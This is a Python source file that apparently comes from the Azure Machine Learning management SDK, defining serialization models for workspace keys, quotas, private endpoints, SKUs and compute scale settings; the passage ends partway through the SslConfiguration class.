class ListAmlUserFeatureResult(msrest.serialization.Model):
"""The List Aml user feature operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of AML user facing features.
:vartype value: list[~azure.mgmt.machinelearningservices.models.AmlUserFeature]
:ivar next_link: The URI to fetch the next page of AML user features information. Call
ListNext() with this to fetch the next page of AML user features information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[AmlUserFeature]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListAmlUserFeatureResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class ListUsagesResult(msrest.serialization.Model):
"""The List Usages operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of AML resource usages.
:vartype value: list[~azure.mgmt.machinelearningservices.models.Usage]
:ivar next_link: The URI to fetch the next page of AML resource usage information. Call
ListNext() with this to fetch the next page of AML resource usage information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Usage]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListUsagesResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class ListWorkspaceKeysResult(msrest.serialization.Model):
"""ListWorkspaceKeysResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar user_storage_key:
:vartype user_storage_key: str
:ivar user_storage_resource_id:
:vartype user_storage_resource_id: str
:ivar app_insights_instrumentation_key:
:vartype app_insights_instrumentation_key: str
:ivar container_registry_credentials:
:vartype container_registry_credentials:
~azure.mgmt.machinelearningservices.models.RegistryListCredentialsResult
:param notebook_access_keys:
:type notebook_access_keys:
~azure.mgmt.machinelearningservices.models.NotebookListCredentialsResult
"""
_validation = {
'user_storage_key': {'readonly': True},
'user_storage_resource_id': {'readonly': True},
'app_insights_instrumentation_key': {'readonly': True},
'container_registry_credentials': {'readonly': True},
}
_attribute_map = {
'user_storage_key': {'key': 'userStorageKey', 'type': 'str'},
'user_storage_resource_id': {'key': 'userStorageResourceId', 'type': 'str'},
'app_insights_instrumentation_key': {'key': 'appInsightsInstrumentationKey', 'type': 'str'},
'container_registry_credentials': {'key': 'containerRegistryCredentials', 'type': 'RegistryListCredentialsResult'},
'notebook_access_keys': {'key': 'notebookAccessKeys', 'type': 'NotebookListCredentialsResult'},
}
def __init__(
self,
*,
notebook_access_keys: Optional["NotebookListCredentialsResult"] = None,
**kwargs
):
super(ListWorkspaceKeysResult, self).__init__(**kwargs)
self.user_storage_key = None
self.user_storage_resource_id = None
self.app_insights_instrumentation_key = None
self.container_registry_credentials = None
self.notebook_access_keys = notebook_access_keys
class ListWorkspaceQuotas(msrest.serialization.Model):
"""The List WorkspaceQuotasByVMFamily operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of Workspace Quotas by VM Family.
:vartype value: list[~azure.mgmt.machinelearningservices.models.ResourceQuota]
:ivar next_link: The URI to fetch the next page of workspace quota information by VM Family.
Call ListNext() with this to fetch the next page of Workspace Quota information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ResourceQuota]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListWorkspaceQuotas, self).__init__(**kwargs)
self.value = None
self.next_link = None
class MachineLearningServiceError(msrest.serialization.Model):
"""Wrapper for error response to follow ARM guidelines.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar error: The error response.
:vartype error: ~azure.mgmt.machinelearningservices.models.ErrorResponse
"""
_validation = {
'error': {'readonly': True},
}
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorResponse'},
}
def __init__(
self,
**kwargs
):
super(MachineLearningServiceError, self).__init__(**kwargs)
self.error = None
class NodeStateCounts(msrest.serialization.Model):
"""Counts of various compute node states on the amlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar idle_node_count: Number of compute nodes in idle state.
:vartype idle_node_count: int
:ivar running_node_count: Number of compute nodes which are running jobs.
:vartype running_node_count: int
:ivar preparing_node_count: Number of compute nodes which are being prepared.
:vartype preparing_node_count: int
:ivar unusable_node_count: Number of compute nodes which are in unusable state.
:vartype unusable_node_count: int
:ivar leaving_node_count: Number of compute nodes which are leaving the amlCompute.
:vartype leaving_node_count: int
:ivar preempted_node_count: Number of compute nodes which are in preempted state.
:vartype preempted_node_count: int
"""
_validation = {
'idle_node_count': {'readonly': True},
'running_node_count': {'readonly': True},
'preparing_node_count': {'readonly': True},
'unusable_node_count': {'readonly': True},
'leaving_node_count': {'readonly': True},
'preempted_node_count': {'readonly': True},
}
_attribute_map = {
'idle_node_count': {'key': 'idleNodeCount', 'type': 'int'},
'running_node_count': {'key': 'runningNodeCount', 'type': 'int'},
'preparing_node_count': {'key': 'preparingNodeCount', 'type': 'int'},
'unusable_node_count': {'key': 'unusableNodeCount', 'type': 'int'},
'leaving_node_count': {'key': 'leavingNodeCount', 'type': 'int'},
'preempted_node_count': {'key': 'preemptedNodeCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(NodeStateCounts, self).__init__(**kwargs)
self.idle_node_count = None
self.running_node_count = None
self.preparing_node_count = None
self.unusable_node_count = None
self.leaving_node_count = None
self.preempted_node_count = None
class NotebookListCredentialsResult(msrest.serialization.Model):
"""NotebookListCredentialsResult.
:param primary_access_key:
:type primary_access_key: str
:param secondary_access_key:
:type secondary_access_key: str
"""
_attribute_map = {
'primary_access_key': {'key': 'primaryAccessKey', 'type': 'str'},
'secondary_access_key': {'key': 'secondaryAccessKey', 'type': 'str'},
}
def __init__(
self,
*,
primary_access_key: Optional[str] = None,
secondary_access_key: Optional[str] = None,
**kwargs
):
super(NotebookListCredentialsResult, self).__init__(**kwargs)
self.primary_access_key = primary_access_key
self.secondary_access_key = secondary_access_key
class NotebookPreparationError(msrest.serialization.Model):
"""NotebookPreparationError.
:param error_message:
:type error_message: str
:param status_code:
:type status_code: int
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'status_code': {'key': 'statusCode', 'type': 'int'},
}
def __init__(
self,
*,
error_message: Optional[str] = None,
status_code: Optional[int] = None,
**kwargs
):
super(NotebookPreparationError, self).__init__(**kwargs)
self.error_message = error_message
self.status_code = status_code
class NotebookResourceInfo(msrest.serialization.Model):
"""NotebookResourceInfo.
:param fqdn:
:type fqdn: str
:param resource_id: The data plane resourceId that is used to initialize the notebook component.
:type resource_id: str
:param notebook_preparation_error: The error that occurs when preparing the notebook.
:type notebook_preparation_error:
~azure.mgmt.machinelearningservices.models.NotebookPreparationError
"""
_attribute_map = {
'fqdn': {'key': 'fqdn', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'notebook_preparation_error': {'key': 'notebookPreparationError', 'type': 'NotebookPreparationError'},
}
def __init__(
self,
*,
fqdn: Optional[str] = None,
resource_id: Optional[str] = None,
notebook_preparation_error: Optional["NotebookPreparationError"] = None,
**kwargs
):
super(NotebookResourceInfo, self).__init__(**kwargs)
self.fqdn = fqdn
self.resource_id = resource_id
self.notebook_preparation_error = notebook_preparation_error
class Operation(msrest.serialization.Model):
"""Azure Machine Learning workspace REST API operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: Display name of operation.
:type display: ~azure.mgmt.machinelearningservices.models.OperationDisplay
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["OperationDisplay"] = None,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
class OperationDisplay(msrest.serialization.Model):
"""Display name of operation.
:param provider: The resource provider name: Microsoft.MachineLearningExperimentation.
:type provider: str
:param resource: The resource on which the operation is performed.
:type resource: str
:param operation: The operation that users can perform.
:type operation: str
:param description: The description for the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationListResult(msrest.serialization.Model):
"""An array of operations supported by the resource provider.
:param value: List of AML workspace operations supported by the AML workspace resource
provider.
:type value: list[~azure.mgmt.machinelearningservices.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
*,
value: Optional[List["Operation"]] = None,
**kwargs
):
super(OperationListResult, self).__init__(**kwargs)
self.value = value
class PaginatedComputeResourcesList(msrest.serialization.Model):
"""Paginated list of Machine Learning compute objects wrapped in ARM resource envelope.
:param value: An array of Machine Learning compute objects wrapped in ARM resource envelope.
:type value: list[~azure.mgmt.machinelearningservices.models.ComputeResource]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ComputeResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ComputeResource"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedComputeResourcesList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class PaginatedWorkspaceConnectionsList(msrest.serialization.Model):
"""Paginated list of Workspace connection objects.
:param value: An array of Workspace connection objects.
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceConnection]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceConnection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedWorkspaceConnectionsList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class Password(msrest.serialization.Model):
"""Password.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name:
:vartype name: str
:ivar value:
:vartype value: str
"""
_validation = {
'name': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Password, self).__init__(**kwargs)
self.name = None
self.value = None
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(msrest.serialization.Model):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the private endpoint connection.
:vartype id: str
:ivar name: Friendly name of the private endpoint connection.
:vartype name: str
:ivar type: Resource type of private endpoint connection.
:vartype type: str
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~azure.mgmt.machinelearningservices.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~azure.mgmt.machinelearningservices.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
private_endpoint: Optional["PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["PrivateLinkServiceConnectionState"] = None,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = None
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
required_zone_names: Optional[List[str]] = None,
**kwargs
):
super(PrivateLinkResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~azure.mgmt.machinelearningservices.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
*,
value: Optional[List["PrivateLinkResource"]] = None,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = value
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[str] = None,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
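# Illustrative sketch (not part of the generated SDK): approving a private endpoint
# connection by attaching a connection state to the PrivateEndpointConnection model
# defined earlier in this module. The description text is an assumption.
def _example_approved_private_endpoint_connection():
    state = PrivateLinkServiceConnectionState(
        status="Approved",
        description="Approved by the workspace administrator",
    )
    return PrivateEndpointConnection(private_link_service_connection_state=state)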
class QuotaBaseProperties(msrest.serialization.Model):
"""The properties for Quota update or retrieval.
:param id: Specifies the resource ID.
:type id: str
:param type: Specifies the resource type.
:type type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:param unit: An enum describing the unit of quota measurement. Possible values include:
"Count".
:type unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
type: Optional[str] = None,
limit: Optional[int] = None,
unit: Optional[Union[str, "QuotaUnit"]] = None,
**kwargs
):
super(QuotaBaseProperties, self).__init__(**kwargs)
self.id = id
self.type = type
self.limit = limit
self.unit = unit
class QuotaUpdateParameters(msrest.serialization.Model):
"""Quota update parameters.
:param value: The list for update quota.
:type value: list[~azure.mgmt.machinelearningservices.models.QuotaBaseProperties]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[QuotaBaseProperties]'},
}
def __init__(
self,
*,
value: Optional[List["QuotaBaseProperties"]] = None,
**kwargs
):
super(QuotaUpdateParameters, self).__init__(**kwargs)
self.value = value
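# Illustrative sketch (not part of the generated SDK): requesting a quota update for
# a VM family by combining QuotaBaseProperties entries into QuotaUpdateParameters.
# The resource id, VM family, and limit below are placeholders.
def _example_quota_update():
    return QuotaUpdateParameters(
        value=[
            QuotaBaseProperties(
                id=(
                    "/subscriptions/<subscription-id>/providers"
                    "/Microsoft.MachineLearningServices/locations/<region>"
                    "/quotas/<vm-family>"
                ),
                type="Microsoft.MachineLearningServices/quotas",
                limit=48,
                unit="Count",
            ),
        ],
    )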
class RegistryListCredentialsResult(msrest.serialization.Model):
"""RegistryListCredentialsResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location:
:vartype location: str
:ivar username:
:vartype username: str
:param passwords:
:type passwords: list[~azure.mgmt.machinelearningservices.models.Password]
"""
_validation = {
'location': {'readonly': True},
'username': {'readonly': True},
}
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'passwords': {'key': 'passwords', 'type': '[Password]'},
}
def __init__(
self,
*,
passwords: Optional[List["Password"]] = None,
**kwargs
):
super(RegistryListCredentialsResult, self).__init__(**kwargs)
self.location = None
self.username = None
self.passwords = passwords
class ResourceId(msrest.serialization.Model):
"""Represents a resource ID. For example, for a subnet, it is the resource URL for the subnet.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the resource.
:type id: str
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
*,
id: str,
**kwargs
):
super(ResourceId, self).__init__(**kwargs)
self.id = id
class ResourceName(msrest.serialization.Model):
"""The Resource Name.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The name of the resource.
:vartype value: str
:ivar localized_value: The localized name of the resource.
:vartype localized_value: str
"""
_validation = {
'value': {'readonly': True},
'localized_value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceName, self).__init__(**kwargs)
self.value = None
self.localized_value = None
class ResourceQuota(msrest.serialization.Model):
"""The quota assigned to a resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:ivar name: Name of the resource.
:vartype name: ~azure.mgmt.machinelearningservices.models.ResourceName
:ivar limit: The maximum permitted quota of the resource.
:vartype limit: long
:ivar unit: An enum describing the unit of quota measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
'limit': {'readonly': True},
'unit': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'ResourceName'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceQuota, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.limit = None
self.unit = None
class ResourceSkuLocationInfo(msrest.serialization.Model):
"""ResourceSkuLocationInfo.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location: Location of the SKU.
:vartype location: str
:ivar zones: List of availability zones where the SKU is supported.
:vartype zones: list[str]
:ivar zone_details: Details of capabilities available to a SKU in specific zones.
:vartype zone_details: list[~azure.mgmt.machinelearningservices.models.ResourceSkuZoneDetails]
"""
_validation = {
'location': {'readonly': True},
'zones': {'readonly': True},
'zone_details': {'readonly': True},
}
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'zones': {'key': 'zones', 'type': '[str]'},
'zone_details': {'key': 'zoneDetails', 'type': '[ResourceSkuZoneDetails]'},
}
def __init__(
self,
**kwargs
):
super(ResourceSkuLocationInfo, self).__init__(**kwargs)
self.location = None
self.zones = None
self.zone_details = None
class ResourceSkuZoneDetails(msrest.serialization.Model):
"""Describes The zonal capabilities of a SKU.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The set of zones that the SKU is available in with the specified capabilities.
:vartype name: list[str]
:ivar capabilities: A list of capabilities that are available for the SKU in the specified list
of zones.
:vartype capabilities: list[~azure.mgmt.machinelearningservices.models.SKUCapability]
"""
_validation = {
'name': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
}
def __init__(
self,
**kwargs
):
super(ResourceSkuZoneDetails, self).__init__(**kwargs)
self.name = None
self.capabilities = None
class Restriction(msrest.serialization.Model):
"""The restriction because of which SKU cannot be used.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The type of restrictions. As of now only possible value for this is location.
:vartype type: str
:ivar values: The value of restrictions. If the restriction type is set to location, this would
 be the different locations where the SKU is restricted.
:vartype values: list[str]
:param reason_code: The reason for the restriction. Possible values include: "NotSpecified",
"NotAvailableForRegion", "NotAvailableForSubscription".
:type reason_code: str or ~azure.mgmt.machinelearningservices.models.ReasonCode
"""
_validation = {
'type': {'readonly': True},
'values': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'values': {'key': 'values', 'type': '[str]'},
'reason_code': {'key': 'reasonCode', 'type': 'str'},
}
def __init__(
self,
*,
reason_code: Optional[Union[str, "ReasonCode"]] = None,
**kwargs
):
super(Restriction, self).__init__(**kwargs)
self.type = None
self.values = None
self.reason_code = reason_code
class ScaleSettings(msrest.serialization.Model):
"""scale settings for AML Compute.
All required parameters must be populated in order to send to Azure.
:param max_node_count: Required. Max number of nodes to use.
:type max_node_count: int
:param min_node_count: Min number of nodes to use.
:type min_node_count: int
:param node_idle_time_before_scale_down: Node Idle Time before scaling down amlCompute.
:type node_idle_time_before_scale_down: ~datetime.timedelta
"""
_validation = {
'max_node_count': {'required': True},
}
_attribute_map = {
'max_node_count': {'key': 'maxNodeCount', 'type': 'int'},
'min_node_count': {'key': 'minNodeCount', 'type': 'int'},
'node_idle_time_before_scale_down': {'key': 'nodeIdleTimeBeforeScaleDown', 'type': 'duration'},
}
def __init__(
self,
*,
max_node_count: int,
min_node_count: Optional[int] = 0,
node_idle_time_before_scale_down: Optional[datetime.timedelta] = None,
**kwargs
):
super(ScaleSettings, self).__init__(**kwargs)
self.max_node_count = max_node_count
self.min_node_count = min_node_count
self.node_idle_time_before_scale_down = node_idle_time_before_scale_down
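# Illustrative usage sketch (not part of the generated model code): a ScaleSettings
# that lets an AmlCompute cluster autoscale between 0 and 4 nodes and scale down
# after 30 minutes of idle time. The values below are placeholders.
#
#   scale = ScaleSettings(
#       max_node_count=4,
#       min_node_count=0,
#       node_idle_time_before_scale_down=datetime.timedelta(minutes=30),
#   )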
class ServicePrincipalCredentials(msrest.serialization.Model):
"""Service principal credentials.
All required parameters must be populated in order to send to Azure.
:param client_id: Required. Client Id.
:type client_id: str
:param client_secret: Required. Client secret.
:type client_secret: str
"""
_validation = {
'client_id': {'required': True},
'client_secret': {'required': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'client_secret': {'key': 'clientSecret', 'type': 'str'},
}
def __init__(
self,
*,
client_id: str,
client_secret: str,
**kwargs
):
super(ServicePrincipalCredentials, self).__init__(**kwargs)
self.client_id = client_id
self.client_secret = client_secret
class SharedPrivateLinkResource(msrest.serialization.Model):
"""SharedPrivateLinkResource.
:param name: Unique name of the private link.
:type name: str
:param private_link_resource_id: The resource id that private link links to.
:type private_link_resource_id: str
:param group_id: The private link resource group id.
:type group_id: str
:param request_message: Request message.
:type request_message: str
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_link_resource_id': {'key': 'properties.privateLinkResourceId', 'type': 'str'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'request_message': {'key': 'properties.requestMessage', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_link_resource_id: Optional[str] = None,
group_id: Optional[str] = None,
request_message: Optional[str] = None,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
**kwargs
):
super(SharedPrivateLinkResource, self).__init__(**kwargs)
self.name = name
self.private_link_resource_id = private_link_resource_id
self.group_id = group_id
self.request_message = request_message
self.status = status
class Sku(msrest.serialization.Model):
"""Sku of the resource.
:param name: Name of the sku.
:type name: str
:param tier: Tier of the sku like Basic or Enterprise.
:type tier: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
tier: Optional[str] = None,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = name
self.tier = tier
class SKUCapability(msrest.serialization.Model):
"""Features/user capabilities associated with the sku.
:param name: Capability/Feature ID.
:type name: str
:param value: Details about the feature/capability.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(SKUCapability, self).__init__(**kwargs)
self.name = name
self.value = value
class SkuListResult(msrest.serialization.Model):
"""List of skus with features.
:param value:
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceSku]
:param next_link: The URI to fetch the next page of Workspace Skus. Call ListNext() with this
URI to fetch the next page of Workspace Skus.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceSku]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceSku"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(SkuListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class SkuSettings(msrest.serialization.Model):
"""Describes Workspace Sku details and features.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar locations: The set of locations that the SKU is available. This will be supported and
registered Azure Geo Regions (e.g. West US, East US, Southeast Asia, etc.).
:vartype locations: list[str]
:ivar location_info: A list of locations and availability zones in those locations where the
SKU is available.
:vartype location_info:
list[~azure.mgmt.machinelearningservices.models.ResourceSkuLocationInfo]
:ivar tier: Sku Tier like Basic or Enterprise.
:vartype tier: str
:ivar resource_type:
:vartype resource_type: str
:ivar name:
:vartype name: str
:ivar capabilities: List of features/user capabilities associated with the sku.
:vartype capabilities: list[~azure.mgmt.machinelearningservices.models.SKUCapability]
    :param restrictions: The restrictions because of which the SKU cannot be used. This is empty if
there are no restrictions.
:type restrictions: list[~azure.mgmt.machinelearningservices.models.Restriction]
"""
_validation = {
'locations': {'readonly': True},
'location_info': {'readonly': True},
'tier': {'readonly': True},
'resource_type': {'readonly': True},
'name': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'locations': {'key': 'locations', 'type': '[str]'},
'location_info': {'key': 'locationInfo', 'type': '[ResourceSkuLocationInfo]'},
'tier': {'key': 'tier', 'type': 'str'},
'resource_type': {'key': 'resourceType', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
}
def __init__(
self,
*,
restrictions: Optional[List["Restriction"]] = None,
**kwargs
):
super(SkuSettings, self).__init__(**kwargs)
self.locations = None
self.location_info = None
self.tier = None
self.resource_type = None
self.name = None
self.capabilities = None
self.restrictions = restrictions
class SslConfiguration(msrest.serialization.Model):
"""The ssl configuration for scoring.
:param status: Enable or disable ssl for scoring. Possible values include: "Disabled",
"Enabled".
:type status: str or ~azure.mgmt.machinelearningservices.models.SslConfigurationStatus
:param cert: Cert data.
:type cert: str
:param key: Key data.
:type key: str
:param cname: CNAME of the cert.
:type cname: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'cert': {'key': 'cert', 'type': 'str'},
'key': {'key': 'key', 'type': 'str'},
'cname': {'key': 'cname', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "SslConfigurationStatus"]] = None,
cert: Optional[str] = None,
